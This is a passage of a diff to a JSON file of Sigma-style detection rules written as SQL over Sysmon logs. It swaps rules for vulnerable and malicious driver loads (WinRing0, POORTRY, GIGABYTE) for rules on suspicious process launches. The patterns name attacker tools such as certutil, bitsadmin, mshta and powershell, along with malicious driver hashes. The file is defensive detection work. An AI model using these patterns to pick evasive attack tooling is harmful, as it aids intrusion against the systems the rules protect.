'3F2FDA9A7A9C57B7138687BBCE49A2E156D6095DDDABB3454EA09737E02C3FA5', '47F0CDAA2359A63AD1389EF4A635F1F6EEE1F63BDF6EF177F114BDCDADC2E005', '50D5EAA168C077CE5B7F15B3F2C43BD2B86B07B1E926C1B332F8CB13BD2E0793', '56A3C9AC137D862A85B4004F043D46542A1B61C6ACB438098A9640469E2D80E7', '591BD5E92DFA0117B3DAA29750E73E2DB25BAA717C31217539D30FFB1F7F3A52', '5D530E111400785D183057113D70623E17AF32931668AB7C7FC826F0FD4F91A3', '6F1FF29E2E710F6D064DC74E8E011331D807C32CC2A622CBE507FD4B4D43F8F4', '79E2D37632C417138970B4FEBA91B7E10C2EA251C5EFE3D1FC6FA0190F176B57', '85866E8C25D82C1EC91D7A8076C7D073CCCF421CF57D9C83D80D63943A4EDD94', '89B0017BC30CC026E32B758C66A1AF88BD54C6A78E11EC2908FF854E00AC46BE', '9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', '9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', '6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', '80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', '9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', '5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "description": "Detects a suspicious svchost process start", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "status": "test", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", "attack.t1543.003" ], "falsepositives": [ @@ -5668,99 +5500,95 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR 